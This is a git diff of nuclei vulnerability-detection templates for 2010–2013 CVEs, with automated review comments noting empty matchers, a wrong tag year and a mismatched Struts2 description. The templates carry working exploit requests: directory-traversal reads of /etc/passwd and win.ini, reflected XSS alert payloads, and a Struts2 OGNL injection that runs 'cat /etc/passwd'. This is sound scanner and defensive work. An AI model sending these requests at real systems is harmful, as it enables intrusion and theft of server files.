diff --git a/nuclei-templates/CVE-2010/cve-2010-3426.yaml b/nuclei-templates/CVE-2010/cve-2010-3426.yaml
new file mode 100644
index 0000000000..9a7401132f
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-3426.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-3426
+
+info:
+ name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/14964
+ - https://www.cvedetails.com/cve/CVE-2010-3426
+ - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt
+ - http://www.exploit-db.com/exploits/14964
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-3426
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/cve-2010-4239.yaml b/nuclei-templates/CVE-2010/cve-2010-4239.yaml
deleted file mode 100644
index c2b4d8c476..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-4239.yaml
+++ /dev/null
@@ -1,34 +0,0 @@ -id: CVE-2010-4239 - -info: - name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion - author: 0x_akoko - severity: critical - description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. - reference: - - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - - https://www.openwall.com/lists/oss-security/2010/11/22/9 - - https://security-tracker.debian.org/tracker/CVE-2010-4239 - - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2010-4239 - cwe-id: CWE-20 - tags: cve,cve2010,tikiwiki,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" - - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-1669.yaml b/nuclei-templates/CVE-2011/CVE-2011-1669.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-1669.yaml rename to nuclei-templates/CVE-2011/CVE-2011-1669.yaml diff --git a/nuclei-templates/CVE-2011/cve-2011-2780.yaml b/nuclei-templates/CVE-2011/CVE-2011-2780.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-2780.yaml rename to nuclei-templates/CVE-2011/CVE-2011-2780.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml b/nuclei-templates/CVE-2011/CVE-2011-4336.yaml deleted file mode 100644 index e66d9aed23..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2011-4336 - -info: - name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - - https://seclists.org/bugtraq/2011/Nov/140 - remediation: Upgrade to a supported version. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2011-4336 - cwe-id: CWE-79 - tags: seclists,cve,cve2011,xss,tikiwiki - -requests: - - method: GET - path: - - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-4624.yaml b/nuclei-templates/CVE-2011/CVE-2011-4624.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-4624.yaml rename to nuclei-templates/CVE-2011/CVE-2011-4624.yaml diff --git a/nuclei-templates/CVE-2011/cve-2011-4336.yaml b/nuclei-templates/CVE-2011/cve-2011-4336.yaml new file mode 100644 index 0000000000..43736129ab --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4336.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2011-4336
+
+info:
+ name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting
+ author: pikpikcu
+ severity: medium
+ description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
+ - https://www.securityfocus.com/bid/48806/info
+ - https://seclists.org/bugtraq/2011/Nov/140
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2011-4336
+ cwe-id: CWE-79
+ remediation: Upgrade to a supported version.
+ tags: cve,cve2011,xss,tikiwiki
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+# Enhanced by mp on 2022/02/18
diff --git a/nuclei-templates/CVE-2011/CVE-2011-5106.yaml b/nuclei-templates/CVE-2011/cve-2011-5106.yaml
similarity index 100%
rename from nuclei-templates/CVE-2011/CVE-2011-5106.yaml
rename to nuclei-templates/CVE-2011/cve-2011-5106.yaml
diff --git a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml b/nuclei-templates/CVE-2012/CVE-2012-0392.yaml
deleted file mode 100644
index 4058bcdd5b..0000000000
--- a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml
+++ /dev/null
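Review bot: As this page shows it, the body matcher in the new cve-2011-4336.yaml has the single word `''`, and an empty string would presumably match every response body. If that is what is committed, the template reduces to "status 200 and `text/html`" and would flag any HTML page as vulnerable to this XSS. The markup may simply have been stripped when the diff was rendered, so please confirm that the file's word is the decoded script payload sent in the `ajax` parameter. Separately, this version replaces the archived reference that the deleted `CVE-2011-4336.yaml` used with a live `securityfocus.com` URL, which is worth checking still resolves.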
@@ -1,34 +0,0 @@ -id: CVE-2012-0392 - -info: - name: Apache Struts2 S2-008 RCE - author: pikpikcu - severity: critical - description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 - - http://www.exploit-db.com/exploits/18329 - - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html - - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393 - remediation: Developers should immediately upgrade to at least Struts 2.3.18. - classification: - cve-id: CVE-2012-0392 - tags: cve2012,apache,rce,struts,java,edb,cve - -requests: - - method: GET - path: - - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml deleted file mode 100644 index a862bf8c9a..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2012-0896 - -info: - name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access - author: daffainfo - severity: high - description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. - reference: - - https://packetstormsecurity.com/files/108631/ - - https://www.cvedetails.com/cve/CVE-2012-0896 - tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal - classification: - cve-id: CVE-2012-0896 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-1823.yaml b/nuclei-templates/CVE-2012/CVE-2012-1823.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-1823.yaml rename to nuclei-templates/CVE-2012/CVE-2012-1823.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-1835.yaml b/nuclei-templates/CVE-2012/CVE-2012-1835.yaml deleted file mode 100644 index 2d121cbbde..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-1835.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2012-1835 - -info: - name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 - - https://web.archive.org/web/20151001133311/http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html - - http://web.archive.org/web/20210615141436/https://www.securityfocus.com/bid/52986 - - https://www.htbridge.com/advisory/HTB23082 - classification: - cve-id: CVE-2012-1835 - tags: cve,cve2012,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - 
type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-2371.yaml b/nuclei-templates/CVE-2012/CVE-2012-2371.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-2371.yaml rename to nuclei-templates/CVE-2012/CVE-2012-2371.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-3153.yaml b/nuclei-templates/CVE-2012/CVE-2012-3153.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-3153.yaml rename to nuclei-templates/CVE-2012/CVE-2012-3153.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml deleted file mode 100644 index 20a880c2bd..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-4253 - -info: - name: MySQLDumper 1.24.4 - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. - reference: - - https://www.exploit-db.com/exploits/37129 - - https://www.cvedetails.com/cve/CVE-2012-4253 - tags: cve,cve2012,lfi - classification: - cve-id: CVE-2012-4253 - -requests: - - method: GET - path: - - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml b/nuclei-templates/CVE-2012/CVE-2012-4547.yaml deleted file mode 100644 index d156aed493..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2012-4547 - -info: - name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. - reference: - - https://www.exploit-db.com/exploits/36164 - - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - - http://awstats.sourceforge.net/docs/awstats_changelog.txt - - http://openwall.com/lists/oss-security/2012/10/29/7 - classification: - cve-id: CVE-2012-4547 - tags: cve,cve2012,xss,awstats,edb - -requests: - - method: GET - path: - - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' - - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-4889.yaml b/nuclei-templates/CVE-2012/CVE-2012-4889.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-4889.yaml rename to nuclei-templates/CVE-2012/CVE-2012-4889.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-0392.yaml b/nuclei-templates/CVE-2012/cve-2012-0392.yaml new file mode 100644 index 0000000000..40e158645e --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-0392.yaml 
@@ -0,0 +1,34 @@
+id: CVE-2012-0392
+
+info:
+ name: Apache Struts2 S2-008 RCE
+ author: pikpikcu
+ severity: critical
+ description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
+ reference:
+ - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545
+ - http://www.exploit-db.com/exploits/18329
+ - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html
+ - http://secunia.com/advisories/47393
+ remediation: Developers should immediately upgrade to at least Struts 2.3.18.
+ classification:
+ cve-id: CVE-2012-0392
+ tags: cve,cve2012,apache,rce,struts,java
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2012/cve-2012-0896.yaml b/nuclei-templates/CVE-2012/cve-2012-0896.yaml
new file mode 100644
index 0000000000..bda61c73ec
--- /dev/null
+++ b/nuclei-templates/CVE-2012/cve-2012-0896.yaml
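Review bot: The `description` of cve-2012-0392.yaml and its request describe different things: the text names the CookieInterceptor and a crafted Cookie header, while the only request is a GET to `devmode.action?debug=command&expression=…` with no Cookie header. A hit therefore shows that the developer-mode debugging endpoint evaluates expressions, not that the cookie path is exposed, and the description should say what the request checks so a finding is triaged against the right fix. The `remediation` line also disagrees with the description (`2.3.18` against `before 2.3.1.1`). The first `reference` entry holds two URLs in one list item and should be split into `- https://cwiki.apache.org/confluence/display/WW/S2-008` and `- https://blog.csdn.net/weixin_43416469/article/details/113850545`.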
@@ -0,0 +1,33 @@
+id: CVE-2012-0896
+
+info:
+ name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
+ author: daffainfo
+ severity: high
+ description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
+ reference:
+ - https://packetstormsecurity.com/files/108631/
+ - https://www.cvedetails.com/cve/CVE-2012-0896
+ - http://secunia.com/advisories/47529
+ - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
+ classification:
+ cve-id: CVE-2012-0896
+ tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2012/CVE-2012-0901.yaml b/nuclei-templates/CVE-2012/cve-2012-0901.yaml
similarity index 100%
rename from nuclei-templates/CVE-2012/CVE-2012-0901.yaml
rename to nuclei-templates/CVE-2012/cve-2012-0901.yaml
diff --git a/nuclei-templates/CVE-2012/cve-2012-1835.yaml b/nuclei-templates/CVE-2012/cve-2012-1835.yaml
new file mode 100644
index 0000000000..754535a598
--- /dev/null
+++ b/nuclei-templates/CVE-2012/cve-2012-1835.yaml
@@ -0,0 +1,42 @@
+id: CVE-2012-1835
+
+info:
+ name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2012-1835
+ - http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html
+ - http://www.securityfocus.com/bid/52986
+ - https://www.htbridge.com/advisory/HTB23082
+ classification:
+ cve-id: CVE-2012-1835
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
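Review bot: The body matcher of cve-2012-1835.yaml is `words: - ""` as shown here, and an empty word is contained in every response body, so the template would report any host that answers this path with 200 and `text/html` in the headers. If the file really carries the empty string (rather than this page's display having dropped a markup string), the word should be the decoded value the request sends in `title`, `- "</script><script>alert(document.domain)</script>"`, so that a match proves reflection. The same empty body word appears in the added cve-2012-4547.yaml, cve-2013-2287.yaml and cve-2013-3526.yaml. The added CVE-2013-6281.yaml matches `page: ''` with nothing between the quotes, which has the same weakness.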
diff --git a/nuclei-templates/CVE-2012/cve-2012-4253.yaml b/nuclei-templates/CVE-2012/cve-2012-4253.yaml
new file mode 100644
index 0000000000..e9211386c2
--- /dev/null
+++ b/nuclei-templates/CVE-2012/cve-2012-4253.yaml
@@ -0,0 +1,33 @@
+id: CVE-2012-4253
+
+info:
+ name: MySQLDumper 1.24.4 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
+ reference:
+ - https://www.exploit-db.com/exploits/37129
+ - https://www.cvedetails.com/cve/CVE-2012-4253
+ - http://www.osvdb.org/81609
+ - http://www.osvdb.org/81615
+ classification:
+ cve-id: CVE-2012-4253
+ tags: cve,cve2012,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2012/CVE-2012-4273.yaml b/nuclei-templates/CVE-2012/cve-2012-4273.yaml
similarity index 100%
rename from nuclei-templates/CVE-2012/CVE-2012-4273.yaml
rename to nuclei-templates/CVE-2012/cve-2012-4273.yaml
diff --git a/nuclei-templates/CVE-2012/cve-2012-4547.yaml b/nuclei-templates/CVE-2012/cve-2012-4547.yaml
new file mode 100644
index 0000000000..4a35ca2a5e
--- /dev/null
+++ b/nuclei-templates/CVE-2012/cve-2012-4547.yaml
@@ -0,0 +1,40 @@
+id: CVE-2012-4547
+
+info:
+ name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
+ author: dhiyaneshDk
+ severity: medium
+ description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+ reference:
+ - https://www.exploit-db.com/exploits/36164
+ - https://nvd.nist.gov/vuln/detail/CVE-2012-4547
+ - http://awstats.sourceforge.net/docs/awstats_changelog.txt
+ - http://openwall.com/lists/oss-security/2012/10/29/7
+ classification:
+ cve-id: CVE-2012-4547
+ tags: cve,cve2020,xss,awstats
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
+ - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2013/cve-2013-2251.yaml b/nuclei-templates/CVE-2013/CVE-2013-2251.yaml
similarity index 100%
rename from nuclei-templates/CVE-2013/cve-2013-2251.yaml
rename to nuclei-templates/CVE-2013/CVE-2013-2251.yaml
diff --git a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml b/nuclei-templates/CVE-2013/CVE-2013-2287.yaml
deleted file mode 100644
index 53312074c8..0000000000
--- a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml
+++ /dev/null
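Review bot: The `tags` line of cve-2012-4547.yaml reads `cve,cve2020,xss,awstats` although the template id is CVE-2012-4547, so a run or inventory filtered on `cve2012` skips this check and one filtered on `cve2020` picks it up under the wrong year. The line should read `tags: cve,cve2012,xss,awstats`; the deleted CVE-2012-4547.yaml used `cve2012` and also carried `edb`, which this version drops.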
@@ -1,37 +0,0 @@ -id: CVE-2013-2287 - -info: - name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 - - https://www.dognaedis.com/vulns/DGS-SEC-16.html - - http://osvdb.org/90840 - classification: - cve-id: CVE-2013-2287 - tags: cve,cve2013,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/CVE-2013-3526.yaml b/nuclei-templates/CVE-2013/CVE-2013-3526.yaml deleted file mode 100644 index aca8c27951..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-3526.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2013-3526 - -info: - name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/ - classification: - cve-id: CVE-2013-3526 - tags: cve,cve2013,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2013/CVE-2013-6281.yaml b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml new file mode 100644 index 0000000000..d08cfdb755 --- /dev/null +++ b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2013-6281
+info:
+ name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
+ author: random-robbie
+ severity: medium
+ description: |
+ The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
+ - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
+ - https://wordpress.org/plugins/dhtmlxspreadsheet/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2013-6281
+ cwe-id: CWE-79
+ metadata:
+ google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
+ verified: "true"
+ tags: cve,cve2013,wordpress,xss,wp-plugin,wp
+requests:
+ - raw:
+ - |
+ GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "page: ''"
+ - "dhx_rel_path"
+ condition: and
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2013/cve-2013-7240.yaml b/nuclei-templates/CVE-2013/CVE-2013-7240.yaml
similarity index 100%
rename from nuclei-templates/CVE-2013/cve-2013-7240.yaml
rename to nuclei-templates/CVE-2013/CVE-2013-7240.yaml
diff --git a/nuclei-templates/CVE-2013/cve-2013-2287.yaml b/nuclei-templates/CVE-2013/cve-2013-2287.yaml
new file mode 100644
index 0000000000..5d169d1e53
--- /dev/null
